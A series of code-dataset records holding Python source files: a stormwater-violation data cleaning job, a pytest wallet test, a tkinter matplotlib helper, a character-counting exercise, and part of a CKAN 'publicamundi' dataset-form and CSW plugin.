ptsv['VIOLATOR'] = ptsv['PROJ_TITLE']\n ptsv['ADDITIONAL_1'] = ptsv['SCOPE']\n ptsv['ADDITIONAL_2'] = ptsv['CONSTRUCTION_NOTE']\n ptsv['COMPLY_BY'] = ''\n\n\n ptsv = ptsv[['UUID',\n 'SRC',\n 'TYPE',\n 'STATUS',\n 'ISSUE_DATE',\n 'COMPLY_BY',\n 'PARCEL_APN',\n 'LON',\n 'LAT',\n 'ADDRESS',\n 'VIOLATOR',\n 'ADDITIONAL_1',\n 'ADDITIONAL_2']]\n\n return ptsv\n\ndef _clean_vpm_violations():\n \"\"\" Clean vpm violations \"\"\"\n\n vpm = pd.read_csv(temp_file_vpm)\n\n\n vpm['SRC'] = 'PW_VPM'\n vpm['sw_bmp_report_id'] = vpm['sw_bmp_report_id'].astype(str)\n vpm['project_id'] = vpm['project_id'].astype(str)\n vpm['permit_number'] = vpm.permit_number.astype(str)\n vpm['UUID'] = (vpm['SRC'] + '_' + vpm['sw_bmp_report_id'] + '_' + vpm['project_id']).str.lower()\n vpm['LON'] = np.nan\n vpm['LAT'] = np.nan\n vpm['STATUS'] = vpm['bmpr_state']\n vpm['TYPE'] = vpm.title\n vpm['PARCEL_APN'] = ''\n vpm['ISSUE_DATE'] = vpm['report_date']\n vpm['COMPLY_BY'] = vpm['reinspection_date']\n vpm['ADDRESS'] = vpm.location_street.astype(str)\n vpm['CITY'] = vpm.location_city\n vpm['STATE'] = vpm.location_state\n vpm['ZIP'] = vpm.location_zip\n vpm['VIOLATOR'] = vpm.project_name\n vpm['ADDITIONAL_1'] = vpm.comments\n vpm['ADDITIONAL_2'] = ''\n\n\n vpm = vpm[['UUID',\n 'SRC',\n 'TYPE',\n 'STATUS',\n 'ISSUE_DATE',\n 'COMPLY_BY',\n 'PARCEL_APN',\n 'LON',\n 'LAT',\n 'ADDRESS',\n 'VIOLATOR',\n 'ADDITIONAL_1',\n 'ADDITIONAL_2']]\n\n return vpm\n\n\n\ndef _clean_sf_violations():\n \"\"\" Clean TSW violations from SF \"\"\"\n\n sfv = pd.read_csv(temp_file_sf, dtype={\n 'Site: Street Number': str,\n 'Violation Date Formatted': str,\n 'BMP Compliance Deadline': str,\n 'Site: Primary Parcel Number': str\n })\n\n sfv.columns = ['V_NUM',\n 'STATUS',\n 'STATUS_1',\n 'V_TYPE',\n 'TYPE',\n 'V_DATE',\n 'BMP_COMP_DEADLINE',\n 'SITE_ID',\n 'PARCEL_APN',\n 'ADDRESS_NUM',\n 'ADDRESS_STREET',\n 'ADDRESS_CITY',\n 'ADDRESS_STATE',\n 'VIOLATOR']\n\n sfv['SRC'] = 'TSW_SF'\n sfv['LON'] = np.nan\n sfv['LAT'] = np.nan\n sfv['STATUS'] = sfv['STATUS']\n sfv['TYPE'] = sfv['V_TYPE'] + ': ' + sfv['TYPE']\n sfv['UUID'] = (sfv['SRC'] + '_' + sfv['V_NUM'].str.replace('-', '_')).str.lower()\n sfv['ADDRESS'] = (sfv['ADDRESS_NUM'] + ' ' + sfv['ADDRESS_STREET']).astype(str)\n sfv['ISSUE_DATE'] = sfv.V_DATE\n sfv['COMPLY_BY'] = sfv.BMP_COMP_DEADLINE\n sfv['ADDITIONAL_1'] = sfv['STATUS_1']\n sfv['ADDITIONAL_2'] = ''\n\n sfv = sfv[['UUID',\n 'SRC',\n 'TYPE',\n 'STATUS',\n 'ISSUE_DATE',\n 'COMPLY_BY',\n 'PARCEL_APN',\n 'LON',\n 'LAT',\n 'ADDRESS',\n 'VIOLATOR',\n 'ADDITIONAL_1',\n 'ADDITIONAL_2']]\n\n return sfv\n\ndef parcel_to_address(x):\n\n if x['ADDRESS'] == '' or x['ADDRESS'] == 'nan':\n\n if x['PARCEL_APN'] != '':\n\n return geospatial.get_address_for_apn(x['PARCEL_APN'])\n\n else:\n\n return ''\n\n else:\n\n return x['ADDRESS']\n\ndef get_violation_coords(x):\n\n if x['ADDRESS'] != '':\n\n if not x['ADDRESS'].startswith('APN:'):\n\n return geospatial.census_address_geocoder(address_line=x['ADDRESS'])\n\n else:\n\n logging.info(\"Could not get address from APN\")\n\n return np.nan, np.nan\n\n else:\n\n logging.info(\"Could not find any address information\")\n\n return np.nan, np.nan","sub_path":"poseidon/dags/tsw_integration/tsw_integration_jobs.py","file_name":"tsw_integration_jobs.py","file_ext":"py","file_size_in_byte":13500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"495462250","text":"\"\"\"\nThis test runs tests that use a pytest fixture my_wallet\nwith two sets of {earn, spend, expected} values\n\"\"\"\n\nimport pytest\nfrom wallet import Wallet, InsufficientAmount\n\n\n@pytest.fixture\ndef my_wallet():\n '''Returns a Wallet instance with a zero balance'''\n return Wallet()\n\n@pytest.mark.parametrize(\"earned,spent,expected\", [\n (30, 10, 20),\n (20, 2, 18),\n])\ndef test_transactions(my_wallet, earned, spent, expected):\n my_wallet.add_cash(earned)\n my_wallet.spend_cash(spent)\n assert my_wallet.balance == expected","sub_path":"practice/test_wallet_with_fixtures_and_parameterized_test_functions.py","file_name":"test_wallet_with_fixtures_and_parameterized_test_functions.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"408752242","text":"\"\"\"Plot a matplotlib fig on a tkinter widget win (tkinter.Tk() or tkinter.Frame).\"\"\"\nfrom typing import Optional, Union\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\n\n\ndef tk_plot(\n fig: matplotlib.figure.Figure,\n win: Union[tk.Tk, ttk.Frame] = None,\n title: str = \"\",\n toolbar: bool = True,\n) -> FigureCanvasTkAgg:\n r\"\"\"Plot matplotlib figues in a tkinter.Tk/Frame.\n\n Args:\n fig: matplotlib figure\n win: tkinter.Tk() or tkinter.Frame()\n title: tkinter widget title\n toolbar: if set to True, a toolbar (matplotlib toolbar) is shown\n\n Returns:\n canvas: a FigureCanvasTkAgg, run canvas.draw() to update.\n\n snippets\\tkinter drawfig*.py (PySimpleGUi matplotlib exampl)\n matplotlib cookbook: Embedding Matplotlib in a Tkinter GUI application\n\n matplotlib.use('TkAgg')\n\n import seaborn as sns\n sns.set_theme()\n sns.set_style(\"whitegrid\")\n matplotlib.pyplot.ion() # for testing in ipython\n\n from matplotlib.gridspec import GridSpec\n\n # gs = GridSpec(3, 1)\n # gs = fig.add_gridspec(2, 2)\n # ax = fig.add_subplot(gs[0, :])\n\n import numpy as np\n ax = fig.add_subplot()\n t = np.arange(0, 3, .01)\n ax.plot(t, 2 * np.sin(2 * np.pi * t))\n canvas.draw()\n\n # fig.clf()\n ax.cla()\n ax = fig.add_subplot(gs[0, :])\n ax.plot(np.sin(2 * np.pi * t))\n canvas.draw()\n \"\"\"\n if win is None:\n win = tk.Tk()\n if title:\n win.wm_title(title)\n else:\n win.wm_title(\"Fig in Tk\")\n\n canvas = FigureCanvasTkAgg(fig, win)\n canvas.get_tk_widget().pack(side=\"top\", fill=\"both\", expand=1)\n if toolbar:\n NavigationToolbar2Tk(canvas, win)\n\n tk_plot.win = win\n # tk_plot.win.destroy() to exit\n\n return canvas\n\n\ndef main(root):\n \"\"\"Run.\"\"\"\n win = ttk.Frame(root)\n win.pack()\n\n fig = matplotlib.figure.Figure(figsize=(5, 4), dpi=100)\n\n # canvas = tk_plot(fig)\n # tk_plot.win.destroy() # to kill\n\n canvas = tk_plot(fig, win)\n\n canvas.draw()\n canvas.cla() # to clear the canvas\n\n _ = \"\"\"\n # update fig\n ax1 = fig.add_subplot(211) # gs[,] gs = mpl.gridspec.GridSpec(3,1)\n # ax1.plot(...) or sns.heatmap(ax=ax1), df.plot(..., ax=ax)\n canvas.draw()\n\n # fig.clear() # fig.clf()\n #\n # ax1.cla()\n \"\"\"\n\n\nif __name__ == \"__main__\":\n # in ipython\n # %matplotlib tk\n root = tk.Tk()\n root.wm_title(\"Fig in Tk\")\n\n main(root)\n root.mainloop()\n","sub_path":"smatrix/tk_plot.py","file_name":"tk_plot.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"477013978","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# count.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: eduriez +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/03/09 11:00:38 by eduriez #+# #+# #\n# Updated: 2020/03/09 12:01:34 by eduriez ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport string\n\ndef text_analyzer(*text):\n\t\"\"\"\n\tThis function counts the number of upper characters, lower characters,\n\tpunctuation and spaces in a given text.\n\t\"\"\"\n\tnumber_args = len(text)\n\tif number_args < 2:\n\t\tif number_args == 0:\n\t\t\ttext = str(input(\"What is the text to analyze ?\\n<< \"))\n\t\telse:\n\t\t\ttext = text[0]\n\t\tif text == \"\":\n\t\t\tprint(\"empty text.\")\n\t\telse:\n\t\t\tlower_number = 0\n\t\t\tupper_number = 0\n\t\t\tpunctuation_number = 0\n\t\t\tspace_number = 0\n\t\t\tfor current_char in text:\n\t\t\t\tif current_char.islower():\n\t\t\t\t\tlower_number += 1\n\t\t\t\telif current_char.isupper():\n\t\t\t\t\tupper_number += 1\n\t\t\t\telif current_char.isspace():\n\t\t\t\t\tspace_number += 1\n\t\t\t\telif current_char in string.punctuation:\n\t\t\t\t\tpunctuation_number += 1\n\t\t\tprint(f\"\"\"The text contains {len(text)} characters:\n\n- {upper_number} upper letters\n\n- {lower_number} lower letters\n\n- {punctuation_number} punctuation marks\n\n- {space_number} spaces\"\"\")\n\telse:\n\t\tprint(\"ERROR\")\n","sub_path":"bootcamp_python_for_ML/D00/ex03/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"328815256","text":"import re\nimport datetime\nimport json\nimport weberror\nimport logging\nimport string\nimport urllib\nimport geoalchemy\nfrom itertools import chain, ifilter\nfrom routes.mapper import SubMapper\n\nimport ckan.model as model\nimport ckan.plugins as p\nimport ckan.plugins.toolkit as toolkit\nimport ckan.logic as logic\n\nimport ckanext.publicamundi.model as ext_model\nimport ckanext.publicamundi.lib.metadata as ext_metadata\nimport ckanext.publicamundi.lib.metadata.validators as ext_validators\nimport ckanext.publicamundi.lib.actions as ext_actions\nimport ckanext.publicamundi.lib.template_helpers as ext_template_helpers\nimport ckanext.publicamundi.lib.pycsw_sync as ext_pycsw_sync\n\nfrom ckanext.publicamundi.lib.util import (to_json, random_name, Breakpoint)\nfrom ckanext.publicamundi.lib.metadata import dataset_types\n\n_ = toolkit._\nasbool = toolkit.asbool\naslist = toolkit.aslist\nurl_for = toolkit.url_for\n\nlog1 = logging.getLogger(__name__)\n\nclass DatasetForm(p.SingletonPlugin, toolkit.DefaultDatasetForm):\n '''Override the default dataset form.\n '''\n \n p.implements(p.ITemplateHelpers)\n p.implements(p.IConfigurable, inherit=True)\n p.implements(p.IConfigurer, inherit=True)\n p.implements(p.IDatasetForm, inherit=True)\n p.implements(p.IRoutes, inherit=True)\n p.implements(p.IActions, inherit=True)\n p.implements(p.IPackageController, inherit=True)\n p.implements(p.IResourceController, inherit=True)\n p.implements(p.IFacets, inherit=True)\n\n _debug = False\n\n _dataset_types = None\n\n ## Define helper methods ## \n\n @classmethod\n def dataset_types(cls):\n '''Provide a dict of supported dataset types'''\n return cls._dataset_types\n\n @classmethod\n def dataset_type_options(cls):\n '''Provide options for dataset-type (needed for selects)'''\n for k, spec in cls._dataset_types.items():\n yield { 'value': k, 'text': spec['title'] }\n\n ## ITemplateHelpers interface ##\n\n def get_helpers(self):\n '''Return a dict of named helper functions (ITemplateHelpers interface).\n These helpers will be available under the 'h' thread-local global object.\n '''\n\n return {\n 'debug': lambda: self._debug,\n 'random_name': random_name,\n 'filtered_list': ext_template_helpers.filtered_list,\n 'dataset_types': self.dataset_types,\n 'dataset_type_options': self.dataset_type_options,\n 'organization_objects': ext_template_helpers.get_organization_objects,\n 'make_metadata_object': ext_metadata.make_metadata_object,\n 'markup_for_field': ext_metadata.markup_for_field,\n 'markup_for_object': ext_metadata.markup_for_object,\n 'markup_for': ext_metadata.markup_for,\n 'resource_ingestion_result': ext_template_helpers.resource_ingestion_result,\n }\n\n ## IConfigurer interface ##\n\n def update_config(self, config):\n '''Configure CKAN (Pylons) environment'''\n\n # Setup static resources\n\n p.toolkit.add_public_directory(config, 'public')\n p.toolkit.add_template_directory(config, 'templates')\n p.toolkit.add_template_directory(config, 'templates_legacy')\n p.toolkit.add_resource('public', 'ckanext-publicamundi')\n \n return\n\n ## IConfigurable interface ##\n\n def configure(self, config):\n '''Pass configuration to plugins and extensions'''\n \n cls = type(self)\n\n # Are we in debug mode?\n\n cls._debug = asbool(config['global_conf']['debug'])\n \n # Set supported dataset types\n\n type_keys = aslist(config['ckanext.publicamundi.dataset_types'])\n cls._dataset_types = { k: spec\n for k, spec in dataset_types.items() if k in type_keys }\n\n # Modify the pattern for valid names for {package, groups, organizations}\n \n if asbool(config.get('ckanext.publicamundi.validation.relax_name_pattern')):\n logic.validators.name_match = re.compile('[a-z][a-z0-9~_\\-]*$')\n log1.info('Using pattern for valid names: %r', \n logic.validators.name_match.pattern)\n \n # Setup extension-wide cache manager\n\n from ckanext.publicamundi import cache_manager\n cache_manager.setup(config)\n \n return\n\n ## IRoutes interface ##\n\n def before_map(self, mapper):\n '''Setup routes before CKAN defines core routes.'''\n\n api_controller = 'ckanext.publicamundi.controllers.api:Controller'\n \n with SubMapper(mapper, controller=api_controller) as m:\n \n m.connect(\n '/api/publicamundi/util/resource/mimetype_autocomplete',\n action='resource_mimetype_autocomplete')\n \n m.connect(\n '/api/publicamundi/util/resource/format_autocomplete',\n action='resource_format_autocomplete')\n\n m.connect(\n '/api/publicamundi/vocabularies',\n action='vocabularies_list')\n \n m.connect(\n '/api/publicamundi/vocabularies/{name}',\n action='vocabulary_get')\n \n m.connect(\n '/api/publicamundi/dataset/export/{name_or_id}', \n action='dataset_export')\n \n m.connect(\n '/api/publicamundi/dataset/import', \n action='dataset_import',\n conditions=dict(method=['POST']))\n\n user_controller = 'ckanext.publicamundi.controllers.user:UserController'\n\n with SubMapper(mapper, controller=user_controller) as m:\n \n # Fixme: unneeded parameters to mapper.connect ?\n\n m.connect(\n 'user_dashboard_resources',\n '/dashboard/resources',\n action='show_dashboard_resources')\n \n m.connect(\n 'admin_page_resources', \n '/user/resources',\n action='show_admin_page_resources')\n \n m.connect(\n 'reject_resource',\n '/{parent}/resources/reject/{resource_id}',\n action='reject_resource')\n \n m.connect(\n 'identify_vector_resource', # Fixme: adapt\n '/{parent}/resources/identify_vector/{resource_id}',\n action='identify_resource',\n storer_type='vector')\n \n m.connect(\n 'render_ingestion',\n '/{parent}/resources/ingest/{resource_id}',\n action='render_ingestion_template')\n \n files_controller = 'ckanext.publicamundi.controllers.files:Controller'\n \n with SubMapper(mapper, controller=files_controller) as m:\n \n m.connect(\n '/publicamundi/files/{object_type}/{name_or_id}/download/{filename:.*?}',\n action='download_file')\n \n m.connect(\n '/publicamundi/files/{object_type}', \n action='upload_file',\n conditions=dict(method=['POST']))\n \n package_controller = 'ckanext.publicamundi.controllers.package:Controller'\n\n mapper.connect(\n '/dataset/import_metadata',\n controller=package_controller,\n action='import_metadata')\n \n tests_controller = 'ckanext.publicamundi.controllers.tests:Controller'\n\n mapper.connect(\n 'publicamundi-tests', \n '/testing/publicamundi/{action}/{id}',\n controller=tests_controller)\n \n mapper.connect(\n 'publicamundi-tests', \n '/testing/publicamundi/{action}',\n controller=tests_controller)\n\n return mapper\n\n ## IActions interface ##\n\n def get_actions(self):\n return {\n 'mimetype_autocomplete': ext_actions.autocomplete.mimetype_autocomplete,\n 'dataset_export': ext_actions.package.dataset_export,\n 'dataset_import': ext_actions.package.dataset_import,\n }\n\n ## IDatasetForm interface ##\n\n def is_fallback(self):\n '''\n Return True to register this plugin as the default handler for\n package types not handled by any other IDatasetForm plugin.\n '''\n return True\n\n def package_types(self):\n '''\n This plugin doesn't handle any special package types, it just\n registers itself as the default (above).\n '''\n return []\n\n def __modify_package_schema(self, schema):\n '''Define modify schema for both create/update operations.\n '''\n\n check_not_empty = toolkit.get_validator('not_empty')\n ignore_missing = toolkit.get_validator('ignore_missing')\n ignore_empty = toolkit.get_validator('ignore_empty')\n convert_to_extras = toolkit.get_converter('convert_to_extras')\n default_initializer = toolkit.get_validator('default')\n \n # Add dataset-type, the field that distinguishes metadata formats\n\n is_dataset_type = ext_validators.is_dataset_type\n schema['dataset_type'] = [\n default_initializer('ckan'), convert_to_extras, is_dataset_type,\n ]\n \n # Add package field-level validators/converters\n \n # Note We provide a union of fields for all supported schemata.\n # Of course, not all of them will be present in a specific dataset,\n # so any \"required\" constraint cannot be applied here.\n\n get_field_processor = ext_validators.get_field_edit_processor\n \n for dt, dt_spec in self._dataset_types.items():\n flattened_fields = dt_spec.get('class').get_flattened_fields(opts={\n 'serialize-keys': True,\n 'key-prefix': dt_spec.get('key_prefix', dt)\n })\n for field_name, field in flattened_fields.items():\n # Build chain of processors for field\n schema[field_name] = [ \n ignore_missing, get_field_processor(field),\n ]\n \n # Add before/after package-level processors\n\n preprocess_dataset = ext_validators.preprocess_dataset_for_edit\n postprocess_dataset = ext_validators.postprocess_dataset_for_edit\n \n schema['__before'].insert(-1, preprocess_dataset)\n\n if not '__after' in schema:\n schema['__after'] = []\n schema['__after'].append(postprocess_dataset)\n \n # Add or replace resource field-level validators/converters\n\n guess_resource_type = ext_validators.guess_resource_type_if_empty\n\n schema['resources'].update({\n 'resource_type': [\n guess_resource_type, string.lower, unicode],\n 'format': [\n check_not_empty, string.lower, unicode],\n })\n\n # Done, return updated schema\n\n return schema\n\n def create_package_schema(self):\n schema = super(DatasetForm, self).create_package_schema()\n schema = self.__modify_package_schema(schema)\n return schema\n\n def update_package_schema(self):\n schema = super(DatasetForm, self).update_package_schema()\n schema = self.__modify_package_schema(schema)\n return schema\n\n def show_package_schema(self):\n schema = super(DatasetForm, self).show_package_schema()\n\n # Don't show vocab tags mixed in with normal 'free' tags\n # (e.g. on dataset pages, or on the search page)\n schema['tags']['__extras'].append(toolkit.get_converter('free_tags_only'))\n \n check_not_empty = toolkit.get_validator('not_empty')\n ignore_missing = toolkit.get_validator('ignore_missing')\n convert_from_extras = toolkit.get_converter('convert_from_extras')\n \n schema['dataset_type'] = [convert_from_extras, check_not_empty]\n \n # Add package field-level converters\n \n get_field_processor = ext_validators.get_field_read_processor\n\n for dt, dt_spec in self._dataset_types.items():\n flattened_fields = dt_spec.get('class').get_flattened_fields(opts={\n 'serialize-keys': True,\n 'key-prefix': dt_spec.get('key_prefix', dt)\n })\n for field_name, field in flattened_fields.items():\n schema[field_name] = [ \n convert_from_extras, ignore_missing, get_field_processor(field)\n ]\n \n # Add before/after package-level processors\n \n preprocess_dataset = ext_validators.preprocess_dataset_for_read\n postprocess_dataset = ext_validators.postprocess_dataset_for_read\n\n schema['__before'].insert(-1, preprocess_dataset)\n \n if not '__after' in schema:\n schema['__after'] = []\n schema['__after'].append(postprocess_dataset)\n \n return schema\n\n def setup_template_variables(self, context, data_dict):\n ''' Setup (add/modify/hide) variables to feed the template engine.\n This is done through through toolkit.c (template thread-local context object).\n '''\n \n super(DatasetForm, self).setup_template_variables(context, data_dict)\n\n c = toolkit.c\n c.publicamundi_magic_number = 99\n \n if c.search_facets:\n # Provide label functions for certain facets\n if not c.facet_labels:\n c.facet_labels = {\n 'res_format': lambda t: t['display_name'].upper()\n }\n\n # Note for all *_template hooks: \n # We choose not to modify the path for each template (so we simply call super()). \n # If a specific template's behaviour needs to be overriden, this can be done by \n # means of template inheritance (e.g. Jinja2 `extends' or CKAN `ckan_extends')\n\n def new_template(self):\n return super(DatasetForm, self).new_template()\n\n def read_template(self):\n return super(DatasetForm, self).read_template()\n\n def edit_template(self):\n return super(DatasetForm, self).edit_template()\n\n def comments_template(self):\n return super(DatasetForm, self).comments_template()\n\n def search_template(self):\n return super(DatasetForm, self).search_template()\n\n def history_template(self):\n return super(DatasetForm, self).history_template()\n\n ## IPackageController interface ##\n \n def after_create(self, context, pkg_dict):\n log1.debug('after_create: Package %s is created', pkg_dict.get('name'))\n pass\n\n def after_update(self, context, pkg_dict):\n log1.debug('after_update: Package %s is updated', pkg_dict.get('name'))\n pass\n\n def after_show(self, context, pkg_dict):\n '''Hook into the validated data dict after the package is ready for display. \n \n The main tasks here are:\n * Fix types for serialized dataset_type-related values (converted to unicode,\n whereas should be str).\n * Convert dataset_type-related parts of pkg_dict to a nested dict or an object.\n\n This hook is for reading purposes only, i.e for template variables, api results, \n form initial values etc. It should *not* affect the way the read schema is used: \n schema items declared at read_package_schema() should not be removed (though their \n values can be changed!).\n '''\n\n is_validated = context.get('validate', True)\n for_view = context.get('for_view', False)\n \n log1.debug('after_show: Package %s is shown: view=%s validated=%s api=%s', \n pkg_dict.get('name'), for_view, is_validated, context.get('api_version'))\n \n if not is_validated:\n # Noop: the extras are not yet promoted to 1st-level fields\n return\n\n # Determine dataset_type-related parameters for this package\n \n dt = pkg_dict.get('dataset_type')\n if not dt:\n # Noop: cannot recognize dataset-type (pkg_dict has raw extras?)\n return\n\n dt_spec = self._dataset_types[dt]\n key_prefix = dt_spec.get('key_prefix', dt)\n\n # Fix types, create flat object dict\n \n # Note If we attempt to pop() flat keys here (e.g. to replace them by a \n # nested structure), resource forms will clear all extra fields !!\n\n prefix = key_prefix + '.'\n keys = filter(lambda k: k.startswith(prefix), pkg_dict.iterkeys())\n obj_dict = {}\n for k in keys:\n k1 = k[len(prefix):]\n obj_dict[k1] = pkg_dict[k] = str(pkg_dict[k])\n\n # Objectify \n \n obj_factory = dt_spec.get('class')\n obj = obj_factory().from_dict(obj_dict, is_flat=True, opts={\n 'unserialize-keys': True,\n 'unserialize-values': 'default',\n })\n\n pkg_dict[key_prefix] = obj\n \n # Note We use this bit of hack when package is shown directly from the\n # action api, normally at /api/action/(package|dataset)_show.\n \n r = toolkit.c.environ['pylons.routes_dict']\n if (r['controller'] == 'api' and r.get('action') == 'action' and \n r.get('logic_function') in (\n 'package_show', 'package_create', 'package_update',\n 'dataset_show', 'dataset_create', 'dataset_update')):\n # Remove flat field values (won't be needed anymore)\n for k in keys:\n pkg_dict.pop(k)\n # Dictize obj so that json.dumps can handle it\n pkg_dict[key_prefix] = obj.to_dict(flat=False, opts={\n 'serialize-values': 'json-s' \n })\n \n return pkg_dict\n \n def before_search(self, search_params):\n '''Return a modified (or not) version of the query parameters.\n '''\n #search_params['q'] = 'extras_boo:*';\n #search_params['extras'] = { 'ext_boo': 'far' }\n return search_params\n \n def after_search(self, search_results, search_params):\n '''Receive the search results, as well as the search parameters, and\n return a modified (or not) result with the same structure.\n '''\n #raise Exception('Breakpoint')\n return search_results\n\n def before_index(self, pkg_dict):\n '''Receive what will be given to SOLR for indexing.\n \n This is essentially a flattened dict (except for multi-valued fields \n such as tags) of all the terms sent to the indexer.\n '''\n log1.debug('before_index: Package %s is indexed', pkg_dict.get('name'))\n return pkg_dict\n\n def before_view(self, pkg_dict):\n '''Receive the validated package dict before it is sent to the template. \n '''\n\n log1.debug('before_view: Package %s is prepared for view', pkg_dict.get('name'))\n \n dt = pkg_dict.get('dataset_type')\n dtspec = self._dataset_types.get(dt) if dt else None\n pkg_name, pkg_id = pkg_dict['name'], pkg_dict['id']\n \n # Provide alternative download links for dataset's metadata \n \n if dt:\n download_links = pkg_dict.get('download_links', []) \n if not download_links:\n pkg_dict['download_links'] = download_links\n download_links.extend([\n {\n 'title': dtspec['title'],\n 'url': url_for('/api/action/dataset_show', id=pkg_name),\n 'weight': 0,\n 'format': 'json',\n },\n {\n 'title': dtspec['title'],\n 'url': url_for(\n controller='ckanext.publicamundi.controllers.api:Controller',\n action='dataset_export',\n name_or_id=pkg_name),\n 'weight': 5,\n 'format': 'xml',\n },\n ])\n \n return pkg_dict\n\n ## IResourceController interface ##\n\n def before_show(self, resource_dict):\n '''Receive the validated data dict before the resource is ready for display.\n '''\n \n # Normalize resource format (#66)\n # Note ckan.lib.dictization.model_dictize:resource_dictize converts only\n # some of the formats to uppercase (?), which leads to mixed cases.\n resource_dict['format'] = resource_dict['format'].lower()\n \n return resource_dict\n\n ## IFacets interface ##\n\n def dataset_facets(self, facets_dict, package_type):\n '''Update the facets_dict and return it.\n '''\n if package_type == 'dataset':\n # Todo Maybe reorder facets\n pass\n return facets_dict\n\nclass PackageController(p.SingletonPlugin):\n '''Hook into the package controller\n '''\n\n p.implements(p.IConfigurable, inherit=True)\n p.implements(p.IPackageController, inherit=True)\n \n csw_output_schemata = {\n 'dc': 'http://www.opengis.net/cat/csw/2.0.2',\n 'iso-19115': 'http://www.isotc211.org/2005/gmd',\n 'fgdc': 'http://www.opengis.net/cat/csw/csdgm',\n 'atom': 'http://www.w3.org/2005/Atom',\n 'nasa-dif': 'http://gcmd.gsfc.nasa.gov/Aboutus/xml/dif/',\n }\n \n _pycsw_config_file = None\n _pycsw_service_endpoint = None\n\n ## IConfigurable interface ##\n\n def configure(self, config):\n '''Apply configuration settings to this plugin\n '''\n \n cls = type(self)\n\n site_url = config['ckan.site_url']\n cls._pycsw_config_file = config.get(\n 'ckanext.publicamundi.pycsw.config', \n 'pycsw.ini')\n cls._pycsw_service_endpoint = config.get(\n 'ckanext.publicamundi.pycsw.service_endpoint', \n '%s/csw' % (site_url.rstrip('/')))\n \n ext_pycsw_sync.setup(site_url, self._pycsw_config_file)\n\n return\n\n ## IPackageController interface ##\n\n def after_create(self, context, pkg_dict):\n '''Extensions will receive the validated data dict after the package has been created\n \n Note that the create method will return a package domain object, which may not \n include all fields. Also the newly created package id will be added to the dict.\n At this point, the package is possibly in 'draft' state so most Action-API \n (targeting on the package itself) calls will fail.\n '''\n \n log1.debug('A package was created: %s', pkg_dict['id'])\n self._create_or_update_csw_record(context['session'], pkg_dict)\n pass\n\n def after_update(self, context, pkg_dict):\n '''Extensions will receive the validated data dict after the package has been updated\n \n Note that the edit method will return a package domain object, which may not include \n all fields.\n '''\n \n log1.debug('A package was updated: %s', pkg_dict['id'])\n self._create_or_update_csw_record(context['session'], pkg_dict)\n pass\n\n def after_delete(self, context, pkg_dict):\n '''Extensions will receive the data dict (typically containing just the package id)\n after the package has been deleted.\n '''\n\n log1.debug('A package was deleted: %s', pkg_dict['id'])\n self._delete_csw_record(context['session'], pkg_dict)\n pass\n\n def after_show(self, context, pkg_dict):\n '''Receive the validated data dict after the package is ready for display. \n \n Note that the read method will return a package domain object (which may \n not include all fields).\n '''\n \n #log1.info('A package is shown: %s', pkg_dict)\n pass\n\n def before_search(self, search_params):\n '''Extensions will receive a dictionary with the query parameters just before are\n sent to SOLR backend, and should return a modified (or not) version of it.\n \n Parameter search_params will include an \"extras\" dictionary with all values from \n fields starting with \"ext_\", so extensions can receive user input from specific fields.\n This \"extras\" dictionary will not affect SOLR results, but can be later be used by the\n after_search callback.\n '''\n\n #search_params['q'] = 'extras_boo:*';\n #search_params['extras'] = { 'ext_boo': 'far' }\n return search_params\n\n def after_search(self, search_results, search_params):\n '''Extensions will receive the search results, as well as the search parameters,\n and should return a modified (or not) object with the same structure:\n {\"count\": \"\", \"results\": \"\", \"facets\": \"\"}\n \n Note that count and facets may need to be adjusted if the extension changed the results\n for some reason. Parameter search_params will include an extras dictionary with all \n values from fields starting with \"ext_\", so extensions can receive user input from \n specific fields. For example, the ckanext-spatial extension recognizes the \"ext_bbox\"\n parameter (inside \"extras\" dict) and handles it appropriately by filtering the results on one\n more condition (filters out those not contained in the specified bounding box)\n '''\n \n #raise Exception('Breakpoint')\n return search_results\n\n def before_index(self, pkg_dict):\n '''Extensions will receive what will be given to SOLR for indexing. This is essentially\n a flattened dict (except for multli-valued fields such as tags) of all the terms sent\n to the indexer. The extension can modify this by returning an altered version.\n '''\n return pkg_dict\n\n def before_view(self, pkg_dict):\n '''Extensions will recieve this before the dataset gets displayed.\n \n The dictionary returned will be the one sent to the template.\n '''\n \n dt = pkg_dict.get('dataset_type')\n pkg_name, pkg_id = pkg_dict['name'], pkg_dict['id']\n\n # Provide CSW-backed download links for dataset's metadata \n \n if dt:\n download_links = pkg_dict.get('download_links', []) \n if not download_links:\n pkg_dict['download_links'] = download_links\n download_links.extend([\n {\n 'title': 'DC',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='dc', output_format='application/xml'),\n 'weight': 10,\n 'format': 'xml',\n },\n {\n 'title': 'DC',\n 'generator': 'CSW',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='dc', output_format='application/json'),\n 'weight': 15,\n 'format': 'json',\n },\n {\n 'title': 'ISO-19115',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='iso-19115', output_format='application/xml'),\n 'weight': 15,\n 'format': 'xml',\n },\n {\n 'title': 'ISO-19115',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='iso-19115', output_format='application/json'),\n 'weight': 20,\n 'format': 'json',\n },\n {\n 'title': 'FGDC',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='fgdc', output_format='application/xml'),\n 'weight': 25,\n 'format': 'xml',\n },\n {\n 'title': 'Atom',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='atom', output_format='application/xml'),\n 'weight': 30,\n 'format': 'xml',\n },\n {\n 'title': 